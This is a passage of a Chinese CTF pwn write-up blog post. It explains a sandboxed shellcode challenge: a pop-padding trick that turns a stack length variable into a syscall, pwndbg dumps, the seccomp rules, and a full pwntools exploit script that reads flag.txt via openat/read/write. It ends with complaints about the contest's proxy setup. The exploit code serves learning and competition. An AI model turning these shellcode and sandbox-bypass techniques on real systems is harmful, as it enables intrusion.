<p>此时我们除了控制到程序流还有一个最重要的问题，怎么修改 shellcode 为我们想要的指令。</p>
<p>在我们能控制各个寄存器后我们目前最想要的肯定是 syscall 指令，其 16 进制为 \x05\x0f。</p>
<p>而栈上和寄存器内都没有该值。对于这个问题，我有一个绝妙的办法，可惜这里 … … 完全可以写下 ！</p>
<p>我们将目光放回到我们输入 shellcode 的时候，我们不难发现我们可以输入高达 0x1000 字节长度的 shellcode。</p>
<p>而 v5 则是存放我们输入长度的变量，v5 明显是存在于栈上的。</p>
<p>这意味着我们可以在我们的 shellcode 后面填充大量的毫无意义的 pop 来将 v5 变成 0x50F 。</p>
<p>这正是我们需要的 syscall。</p>
<p>如下：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><code class="hljs python">payload = asm(<span class="hljs-string">&#x27;&#x27;&#x27;</span><br><span class="hljs-string">              pop rbx</span><br><span class="hljs-string">              pop rsi</span><br><span class="hljs-string">              pop rdx</span><br><span class="hljs-string">              pop rbx</span><br><span class="hljs-string">              pop rbx</span><br><span class="hljs-string">              pop rdi</span><br><span class="hljs-string">              push rsi</span><br><span class="hljs-string">              pop rsp</span><br><span class="hljs-string">              pop rbx</span><br><span class="hljs-string">              pop rbx</span><br><span class="hljs-string">              pop rbx</span><br><span class="hljs-string">              push rdx</span><br><span class="hljs-string">              &#x27;&#x27;&#x27;</span>)<br><br>payload = payload.ljust(<span class="hljs-number">0x50f</span>, asm(<span class="hljs-string">&#x27;&#x27;&#x27; pop rbx &#x27;&#x27;&#x27;</span>))<br><br>se(payload)<br></code></pre></td></tr></table></figure>

<p>此时的内存 belike:</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br></pre></td><td class="code"><pre><code class="hljs c">─────────────[ REGISTERS / show-flags off / show-compact-regs off ]─────────────<br> RAX  <span class="hljs-number">0</span><br> RBX  <span class="hljs-number">0</span><br> RCX  <span class="hljs-number">0x79fee95d8381</span> (prctl+<span class="hljs-number">81</span>) ◂— cmp rax, <span class="hljs-number">-0x1000</span> <span class="hljs-comment">/* &#x27;H=&#x27; */</span><br> RDX  <span class="hljs-number">0x79fee9d67000</span> ◂— pop rbx <span class="hljs-comment">/* 0x5c565f5b5b5a5e5b */</span><br> RDI  <span class="hljs-number">0x16</span><br> RSI  <span class="hljs-number">2</span><br> R8   <span class="hljs-number">0</span><br> R9   <span class="hljs-number">3</span><br> R10  <span class="hljs-number">0x79fee95d8381</span> (prctl+<span class="hljs-number">81</span>) ◂— cmp rax, <span class="hljs-number">-0x1000</span> <span class="hljs-comment">/* &#x27;H=&#x27; */</span><br> R11  <span class="hljs-number">0x246</span><br> R12  <span class="hljs-number">0x7fff6f9bf168</span> —▸ <span class="hljs-number">0x7fff6f9bf8d2</span> ◂— <span class="hljs-number">0x4f48006e77702f2e</span> <span class="hljs-comment">/* &#x27;./pwn&#x27; */</span><br> R13  <span class="hljs-number">0x5b3cb73f2ba6</span> (main) ◂— endbr64 <br> R14  <span class="hljs-number">0x5b3cb73f4ce8</span> (__do_global_dtors_aux_fini_array_entry) —▸ <span class="hljs-number">0x5b3cb73f2420</span> (__do_global_dtors_aux) ◂— endbr64 <br> R15  <span class="hljs-number">0x79fee9d6a040</span> (_rtld_global) —▸ <span class="hljs-number">0x79fee9d6b2e0</span> —▸ <span class="hljs-number">0x5b3cb73f1000</span> ◂— <span class="hljs-number">0x10102464c457f</span><br> RBP  <span class="hljs-number">0x7fff6f9bf050</span> ◂— <span class="hljs-number">1</span><br>*RSP  <span class="hljs-number">0x7fff6f9bf038</span> —▸ <span class="hljs-number">0x5b3cb73f2c4c</span> (main+<span class="hljs-number">166</span>) ◂— jmp main+<span class="hljs-number">183</span><br>*RIP  <span class="hljs-number">0x79fee9d67000</span> ◂— pop rbx <span class="hljs-comment">/* 0x5c565f5b5b5a5e5b */</span><br>──────────────────────[ DISASM / x86<span class="hljs-number">-64</span> / <span class="hljs-built_in">set</span> emulate on ]──────────────────────<br> ► <span class="hljs-number">0x79fee9d67000</span>    pop    rbx     RBX =&gt; <span class="hljs-number">0x5b3cb73f2c4c</span> (main+<span class="hljs-number">166</span>)<br>   <span class="hljs-number">0x79fee9d67001</span>    pop    rsi     RSI =&gt; <span class="hljs-number">0x79fee9d67000</span><br>   <span class="hljs-number">0x79fee9d67002</span>    pop    rdx     RDX =&gt; <span class="hljs-number">0x50f</span><br>   <span class="hljs-number">0x79fee9d67003</span>    pop    rbx     RBX =&gt; <span class="hljs-number">1</span><br>   <span class="hljs-number">0x79fee9d67004</span>    pop    rbx     RBX =&gt; <span class="hljs-number">0x79fee94dbd90</span><br>   <span class="hljs-number">0x79fee9d67005</span>    pop    rdi     RDI =&gt; <span class="hljs-number">0</span><br>   <span class="hljs-number">0x79fee9d67006</span>    push   rsi<br>   <span class="hljs-number">0x79fee9d67007</span>    pop    rsp     RSP =&gt; <span class="hljs-number">0x79fee9d67000</span><br>   <span class="hljs-number">0x79fee9d67008</span>    pop    rbx     RBX =&gt; <span class="hljs-number">0x5c565f5b5b5a5e5b</span><br>   <span class="hljs-number">0x79fee9d67009</span>    pop    rbx     RBX =&gt; <span class="hljs-number">0x5b5b5b5b525b5b5b</span><br>   <span class="hljs-number">0x79fee9d6700a</span>    pop    rbx     RBX =&gt; <span class="hljs-number">0x5b5b5b5b5b5b5b5b</span><br>───────────────────────────────────[ STACK ]────────────────────────────────────<br><span class="hljs-number">00</span>:<span class="hljs-number">0000</span>│ rsp <span class="hljs-number">0x7fff6f9bf038</span> —▸ <span class="hljs-number">0x5b3cb73f2c4c</span> (main+<span class="hljs-number">166</span>) ◂— jmp main+<span class="hljs-number">183</span><br><span class="hljs-number">01</span>:<span class="hljs-number">0008</span>│<span class="hljs-number">-010</span> <span class="hljs-number">0x7fff6f9bf040</span> —▸ <span class="hljs-number">0x79fee9d67000</span> ◂— pop rbx <span class="hljs-comment">/* 0x5c565f5b5b5a5e5b */</span><br><span class="hljs-number">02</span>:<span class="hljs-number">0010</span>│<span class="hljs-number">-008</span> <span class="hljs-number">0x7fff6f9bf048</span> ◂— <span class="hljs-number">0x50f</span><br><span class="hljs-number">03</span>:<span class="hljs-number">0018</span>│ rbp <span class="hljs-number">0x7fff6f9bf050</span> ◂— <span class="hljs-number">1</span><br><span class="hljs-number">04</span>:<span class="hljs-number">0020</span>│+<span class="hljs-number">008</span> <span class="hljs-number">0x7fff6f9bf058</span> —▸ <span class="hljs-number">0x79fee94dbd90</span> ◂— mov edi, eax<br><span class="hljs-number">05</span>:<span class="hljs-number">0028</span>│+<span class="hljs-number">010</span> <span class="hljs-number">0x7fff6f9bf060</span> ◂— <span class="hljs-number">0</span><br><span class="hljs-number">06</span>:<span class="hljs-number">0030</span>│+<span class="hljs-number">018</span> <span class="hljs-number">0x7fff6f9bf068</span> —▸ <span class="hljs-number">0x5b3cb73f2ba6</span> (main) ◂— endbr64 <br><span class="hljs-number">07</span>:<span class="hljs-number">0038</span>│+<span class="hljs-number">020</span> <span class="hljs-number">0x7fff6f9bf070</span> ◂— <span class="hljs-number">0x100000000</span><br>─────────────────────────────────[ BACKTRACE ]──────────────────────────────────<br> ► <span class="hljs-number">0</span>   <span class="hljs-number">0x79fee9d67000</span> None<br>   <span class="hljs-number">1</span>   <span class="hljs-number">0x5b3cb73f2c4c</span> main+<span class="hljs-number">166</span><br>   <span class="hljs-number">2</span>   <span class="hljs-number">0x79fee94dbd90</span> None<br>   <span class="hljs-number">3</span>   <span class="hljs-number">0x79fee94dbe40</span> __libc_start_main+<span class="hljs-number">128</span><br>   <span class="hljs-number">4</span>   <span class="hljs-number">0x5b3cb73f23a5</span> _start+<span class="hljs-number">37</span><br>────────────────────────────────────────────────────────────────────────────────<br>pwndbg&gt; <br></code></pre></td></tr></table></figure>

<p>至于为什么在 pop rsp 后那么久才 push rdx。</p>
<p>这是因为 pop 和 push 操作都有以 8 字节为单位的，而 shellcode 的执行是单字节执行的，所以需要写 pop 填充在程序流后面等待 syscall。</p>
<p>至此我们可以轻松构造出 read 来无条件修改 shellcode 进行栈续写衔接程序流 belike:</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs c">  <span class="hljs-number">0x79fee9d6700b</span>    push   rdx<br>  <span class="hljs-number">0x79fee9d6700c</span>    pop    rbx                    RBX =&gt; <span class="hljs-number">0x50f</span><br>  <span class="hljs-number">0x79fee9d6700d</span>    pop    rbx                    RBX =&gt; <span class="hljs-number">0x5b5b5b5b5b5b5b5b</span><br>  <span class="hljs-number">0x79fee9d6700e</span>    pop    rbx                    RBX =&gt; <span class="hljs-number">0x5b5b5b5b5b5b5b5b</span><br>  <span class="hljs-number">0x79fee9d6700f</span>    pop    rbx                    RBX =&gt; <span class="hljs-number">0x5b5b5b5b5b5b5b5b</span><br>► <span class="hljs-number">0x79fee9d67010</span>    syscall  &lt;SYS_read&gt;<br>       fd: <span class="hljs-number">0</span> (socket:[<span class="hljs-number">25238</span>])<br>       buf: <span class="hljs-number">0x79fee9d67000</span> ◂— pop rbx <span class="hljs-comment">/* 0x5c565f5b5b5a5e5b */</span><br>       nbytes: <span class="hljs-number">0x50f</span><br>  <span class="hljs-number">0x79fee9d67012</span>    add    byte ptr [rax], al<br>  <span class="hljs-number">0x79fee9d67014</span>    add    byte ptr [rax], al<br>  <span class="hljs-number">0x79fee9d67016</span>    add    byte ptr [rax], al<br>  <span class="hljs-number">0x79fee9d67018</span>    pop    rbx<br>  <span class="hljs-number">0x79fee9d67019</span>    pop    rbx<br></code></pre></td></tr></table></figure>

<p>还记得我们说的沙盒吗，如下：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs bash"> line  CODE  JT   JF      K<br>=================================<br> 0000: 0x20 0x00 0x00 0x00000004  A = <span class="hljs-built_in">arch</span><br> 0001: 0x15 0x01 0x00 0xc000003e  <span class="hljs-keyword">if</span> (A == ARCH_X86_64) goto 0003<br> 0002: 0x06 0x00 0x00 0x80000000  <span class="hljs-built_in">return</span> KILL_PROCESS<br> 0003: 0x20 0x00 0x00 0x00000000  A = sys_number<br> 0004: 0x15 0x00 0x01 0x00000000  <span class="hljs-keyword">if</span> (A != <span class="hljs-built_in">read</span>) goto 0006<br> 0005: 0x06 0x00 0x00 0x7fff0000  <span class="hljs-built_in">return</span> ALLOW<br> 0006: 0x15 0x00 0x01 0x00000001  <span class="hljs-keyword">if</span> (A != write) goto 0008<br> 0007: 0x06 0x00 0x00 0x7fff0000  <span class="hljs-built_in">return</span> ALLOW<br> 0008: 0x15 0x00 0x01 0x00000101  <span class="hljs-keyword">if</span> (A != openat) goto 0010<br> 0009: 0x06 0x00 0x00 0x7fff0000  <span class="hljs-built_in">return</span> ALLOW<br> 0010: 0x06 0x00 0x00 0x80000000  <span class="hljs-built_in">return</span> KILL_PROCESS<br><br></code></pre></td></tr></table></figure>

<p>(感谢临江仙师傅的帮忙 patch)</p>
<p>你这是典型的 orw 思维，还好我提前准备的对于 openat 函数有所准备，其调用方法为：</p>
<figure class="highlight tex"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs tex">openat：<br><br>rdi = -100（代表当前目录）<br><br>rsi = “flag&quot;的地址<br><br>rdx= 0（只读方式打开）<br><br>rax= 257<br></code></pre></td></tr></table></figure>

<p>所以我的完整 exp:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">import</span> subprocess<br><span class="hljs-keyword">import</span> os<br><span class="hljs-comment">#from ctypes import *</span><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">stre</span>(<span class="hljs-params">a</span>) : <span class="hljs-keyword">return</span> <span class="hljs-built_in">str</span>(a).encode()<br><span class="hljs-keyword">def</span> <span class="hljs-title function_">ph</span>(<span class="hljs-params">a,b=<span class="hljs-string">&quot;addr&quot;</span></span>) : <span class="hljs-built_in">print</span>(b+<span class="hljs-string">&quot;: &quot;</span>+<span class="hljs-built_in">hex</span>(a))<br><span class="hljs-keyword">def</span> <span class="hljs-title function_">re</span>(<span class="hljs-params">a</span>) : <span class="hljs-keyword">return</span> p.recv(a)<br><span class="hljs-keyword">def</span> <span class="hljs-title function_">pre</span>(<span class="hljs-params">a</span>) : <span class="hljs-built_in">print</span>(p.recv(a))<br><span class="hljs-keyword">def</span> <span class="hljs-title function_">reu</span>(<span class="hljs-params">a,b=<span class="hljs-literal">False</span></span>) : <span class="hljs-keyword">return</span> p.recvuntil(a,drop=b)<br><span class="hljs-keyword">def</span> <span class="hljs-title function_">rel</span>() : <span class="hljs-keyword">return</span> p.recvline()<br><span class="hljs-keyword">def</span> <span class="hljs-title function_">se</span>(<span class="hljs-params">a</span>) : p.send(a)<br><span class="hljs-keyword">def</span> <span class="hljs-title function_">sea</span>(<span class="hljs-params">a,b</span>) : p.sendafter(a,b)<br><span class="hljs-keyword">def</span> <span class="hljs-title function_">sel</span>(<span class="hljs-params">a</span>) : p.sendline(a)<br><span class="hljs-keyword">def</span> <span class="hljs-title function_">sela</span>(<span class="hljs-params">a,b</span>) : p.sendlineafter(a,b)<br><span class="hljs-keyword">def</span> <span class="hljs-title function_">op</span>() : p.interactive()<br><span class="hljs-keyword">def</span> <span class="hljs-title function_">cp</span>() : p.close()<br><span class="hljs-keyword">def</span> <span class="hljs-title function_">raddr64</span>() : <span class="hljs-keyword">return</span> u64(p.recv(<span class="hljs-number">6</span>).ljust(<span class="hljs-number">8</span>,<span class="hljs-string">b&#x27;\x00&#x27;</span>)) <br><span class="hljs-keyword">def</span> <span class="hljs-title function_">raddr32</span>() : <span class="hljs-keyword">return</span> u32(p.recv(<span class="hljs-number">4</span>))<br><span class="hljs-keyword">def</span> <span class="hljs-title function_">raddr_T</span>() : <span class="hljs-keyword">return</span> <span class="hljs-built_in">int</span>(re(<span class="hljs-number">14</span>),<span class="hljs-number">16</span>)<br><span class="hljs-keyword">def</span> <span class="hljs-title function_">raddr_A</span>() : <span class="hljs-keyword">return</span> <span class="hljs-built_in">int</span>(reu(<span class="hljs-string">b&quot;-&quot;</span>,<span class="hljs-literal">True</span>),<span class="hljs-number">16</span>)<br><span class="hljs-keyword">def</span> <span class="hljs-title function_">get_pid</span>(<span class="hljs-params">process_name</span>):<br>    ps_output = subprocess.check_output([<span class="hljs-string">&#x27;ps&#x27;</span>, <span class="hljs-string">&#x27;-a&#x27;</span>]).decode(<span class="hljs-string">&#x27;utf-8&#x27;</span>)<br>    lines = ps_output.splitlines()<br>    <span class="hljs-keyword">for</span> line <span class="hljs-keyword">in</span> lines:<br>        <span class="hljs-keyword">if</span> process_name <span class="hljs-keyword">in</span> line:<br>            pid = line.split()[<span class="hljs-number">0</span>]<br>            <span class="hljs-keyword">if</span> pid.isdigit():<br>                <span class="hljs-keyword">return</span> pid<br>    <span class="hljs-keyword">return</span> <span class="hljs-literal">None</span><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">gdbremote</span>(<span class="hljs-params">pid , name = <span class="hljs-string">&#x27;pwn-box-22.04&#x27;</span> , port = <span class="hljs-string">&#x27;10000&#x27;</span> , ip = <span class="hljs-string">&#x27;127.0.0.1&#x27;</span></span>):<br>    os.system(<span class="hljs-string">&quot;gnome-terminal -- bash -c \&quot;docker exec -it &quot;</span> + name + <span class="hljs-string">&quot; gdbserver :&quot;</span> + port + <span class="hljs-string">&quot; --attach &quot;</span> + pid + <span class="hljs-string">&quot; \&quot;&quot;</span>)<br>    os.system(<span class="hljs-string">&quot;gnome-terminal -- bash -c \&quot;gdb -ex \\\&quot;target remote &quot;</span> + ip + <span class="hljs-string">&quot;:&quot;</span> + port + <span class="hljs-string">&quot;\\\&quot; \&quot;&quot;</span>)<br><span class="hljs-keyword">def</span> <span class="hljs-title function_">orw_rop64</span>(<span class="hljs-params">pop_rdi,pop_rsi,pop_rdx,flag_addr,open_addr,read_addr,write_addr</span>):<br>    orw = p64(pop_rdi) + p64(flag_addr) + p64(pop_rsi) + p64(<span class="hljs-number">0</span>) + p64(open_addr)<br>    orw+= p64(pop_rdi) + p64(<span class="hljs-number">3</span>) + p64(pop_rsi) + p64(flag_addr) + p64(pop_rdx) + p64(<span class="hljs-number">0x30</span>)<br>    orw+= p64(read_addr)<br>    orw+= p64(pop_rdi) + p64(<span class="hljs-number">1</span>) + p64(pop_rsi) + p64(flag_addr) + p64(pop_rdx) + p64(<span class="hljs-number">0x30</span>)<br>    orw+= p64(write_addr)<br>    <span class="hljs-keyword">return</span> orw<br><span class="hljs-keyword">def</span> <span class="hljs-title function_">getorw</span>(<span class="hljs-params">name,buf,Arch</span>) :<br>    sh=shellcraft.<span class="hljs-built_in">open</span>(name)<br>    sh+=shellcraft.read(<span class="hljs-number">3</span>,buf,<span class="hljs-number">0x30</span>)<br>    sh+=shellcraft.write(<span class="hljs-number">1</span>,buf,<span class="hljs-number">0x30</span>)<br>    sh=asm(sh,arch=Arch)<br>    <span class="hljs-keyword">return</span> sh<br><span class="hljs-keyword">def</span> <span class="hljs-title function_">gdbp</span>(<span class="hljs-params">p,a=<span class="hljs-string">&#x27;&#x27;</span></span>) :<br>    <span class="hljs-keyword">if</span> a!=<span class="hljs-string">&#x27;&#x27;</span>:<br>        gdb.attach(p,a)<br>        pause()<br>    <span class="hljs-keyword">else</span> :<br>        gdb.attach(p)<br>        pause()<br><br>p = remote(<span class="hljs-string">&quot;127.0.0.1&quot;</span>, <span class="hljs-number">9999</span>)<br><span class="hljs-comment">#p = process(&quot;./pwn&quot;)</span><br><span class="hljs-comment">#elf = ELF(&quot;./pwn&quot;)</span><br><span class="hljs-comment">#libc = ELF(&quot;./libc.so.6&quot;)</span><br><span class="hljs-comment">#lib = cdll.LoadLibrary(None)</span><br><br><span class="hljs-comment">#p = process([&quot;qemu-mipsel-static&quot;,&quot;-g&quot;, &quot;9999&quot;,&quot;-L&quot;,&quot;./&quot;,&quot;./pwn&quot;])</span><br><span class="hljs-comment">#p = process([&quot;qemu-mipsel-static&quot;,&quot;-L&quot;,&quot;./&quot;,&quot;./pwn&quot;])</span><br><br><span class="hljs-comment">#context.log_level = &#x27;debug&#x27;</span><br>context.arch = <span class="hljs-string">&#x27;amd64&#x27;</span><br>context.os = <span class="hljs-string">&#x27;linux&#x27;</span><br><span class="hljs-comment">#elf.arch , elf.so</span><br><br><span class="hljs-comment">#gdbremote(get_pid(&quot;pwn&quot;))</span><br><br>payload = asm(<span class="hljs-string">&#x27;&#x27;&#x27;</span><br><span class="hljs-string">              pop rbx</span><br><span class="hljs-string">              pop rsi</span><br><span class="hljs-string">              pop rdx</span><br><span class="hljs-string">              pop rbx</span><br><span class="hljs-string">              pop rbx</span><br><span class="hljs-string">              pop rdi</span><br><span class="hljs-string">              push rsi</span><br><span class="hljs-string">              pop rsp</span><br><span class="hljs-string">              pop rbx</span><br><span class="hljs-string">              pop rbx</span><br><span class="hljs-string">              pop rbx</span><br><span class="hljs-string">              push rdx</span><br><span class="hljs-string">              &#x27;&#x27;&#x27;</span>)<br><br>payload = payload.ljust(<span class="hljs-number">0x50f</span>, asm(<span class="hljs-string">&#x27;&#x27;&#x27; pop rbx &#x27;&#x27;&#x27;</span>))<br><br>se(payload)<br><br>pause()<br><br>payload = <span class="hljs-string">b&quot;flag.txt&quot;</span><br>payload = payload.ljust(<span class="hljs-number">0x12</span>, <span class="hljs-string">b&quot;\x00&quot;</span>)<br>payload+= asm(<span class="hljs-string">&#x27;&#x27;&#x27;</span><br><span class="hljs-string">            mov r8, rsi</span><br><span class="hljs-string">            mov rdi,-100</span><br><span class="hljs-string">            xor rdx,rdx</span><br><span class="hljs-string">            mov rax,257</span><br><span class="hljs-string">            syscall</span><br><span class="hljs-string">            mov rdi, 2</span><br><span class="hljs-string">            mov rsi, r8</span><br><span class="hljs-string">            add rsi, 0x500</span><br><span class="hljs-string">            mov rdx, 0x20</span><br><span class="hljs-string">            mov rax, 0</span><br><span class="hljs-string">            syscall</span><br><span class="hljs-string">            mov rdi, 1</span><br><span class="hljs-string">            mov rsi, r8</span><br><span class="hljs-string">            add rsi, 0x500</span><br><span class="hljs-string">            mov rdx, 0x20</span><br><span class="hljs-string">            mov rax, 1</span><br><span class="hljs-string">            syscall</span><br><span class="hljs-string">              &#x27;&#x27;&#x27;</span>)<br><br>se(payload)<br><br>op()<br></code></pre></td></tr></table></figure>

<p>事情到这里原本就应该结束了，目前我花了接近一个半小时，离比赛结束还有接近五个小时，此刻问题来了，靶机无法被启动，并且每支队伍仅能同时启动一台靶机，什么意思呢，就是这台靶机被卡住，我们队伍其他靶机也无法启动，主办方是会节省服务器资源的。</p>
<p>修好后已经是接近一个小时以后，启动后初见端倪，靶机显示给了我一个 socket5 的服务器链接以及用户名和密码。要求我连接代理后再次 nc 192.168.100.2。</p>
<p>这位的操作更是惊为天人，坎比 ISCC 的静态靶机，pwn师傅应该都比较清楚，linux的终端本身就是不好走全局代理的东西，至少我目前没有什么好办法能让终端走全局代理，而这 socket5 代理我更是没用过，为了解决这个问题，我花了两个小时。</p>
<p>在从队友手上借到一个 v2ray (Windows端) 后我终于找到新建 socket5 代理的地方，而按照 clash for windows 的经验，这种代理都可以通过局域网共享使用，所以我开启了其局域网共享，并且成功在终端通过配置并使用 proxychains 工具完成了 nc 以及 pwntools 的代理。成功连接上靶机。</p>
<p>我最后获得 flag 了吗，并没有，初步推测为远程的 flag 不叫 flag 或 flag.txt ，或者 jail 环境挡住了我。</p>
<p>最后我想说的是，我好不容易拼了这么久的 shellcode ，你却让我输的这么彻底。</p>
<p>焯！</p>
<p>我的建议是下次也别搞代理了，把所有的题目全部隐藏，只提供网络，所有的网络资源都需要自己扫描发现，包括解题平台，把附件放一台服务器上，靶机放另外一台服务器上，全看自己发现和进行题目匹配。</p>
<p>运维能想出这个代理连接的家里确实得请哈基胖了，给运维赞一个【赞】。</p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>Pwn题笑笑传之奇葩Pwn题-其一</div>
      <div>https://zlsf-zl.github.io/2025/10/14/Pwn题笑笑传之奇葩Pwn题-其一/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>ZLSF</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2025年10月14日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2025/10/15/Pwn%E8%A7%A3%E9%A2%98%E6%A8%A1%E7%89%88%E9%9B%86%E5%90%88/" title="Pwn解题模版集合">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">Pwn解题模版集合</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2025/09/12/watctf_f25_PWN_WP/" title="watctf_f25_PWN_WP">
                        <span class="hidden-mobile">watctf_f25_PWN_WP</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
  
  
    <article id="comments" lazyload>
      
  <div id="valine"></div>
  <script type="text/javascript">
    Fluid.utils.loadComments('#valine', function() {
      Fluid.utils.createScript('https://lib.baomitu.com/valine/1.5.1/Valine.min.js', function() {
        var options = Object.assign(
          {"appId":"6qfbMdW9PFOPATbmhAiyPWcK-MdYXbMMI","appKey":"X9xyyWbc7hafcwTqYXwdhjE5","path":"window.location.pathname","placeholder":"文明发言","avatar":"retro","meta":["nick","mail","link"],"requiredFields":[],"pageSize":10,"lang":"zh-CN","highlight":false,"recordIP":false,"serverURLs":"https://6qfbmdw9.api.lncldglobal.com","emojiCDN":null,"emojiMaps":null,"enableQQ":false},
          {
            el: "#valine",
            path: window.location.pathname
          }
        )
        new Valine(options);
        Fluid.utils.waitElementVisible('#valine .vcontent', () => {
          var imgSelector = '#valine .vcontent img:not(.vemoji)';
          Fluid.plugins.imageCaption(imgSelector);
          Fluid.plugins.fancyBox(imgSelector);
        })
      });
    });
  </script>
  <noscript>Please enable JavaScript to view the comments</noscript>


    </article>
  


          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



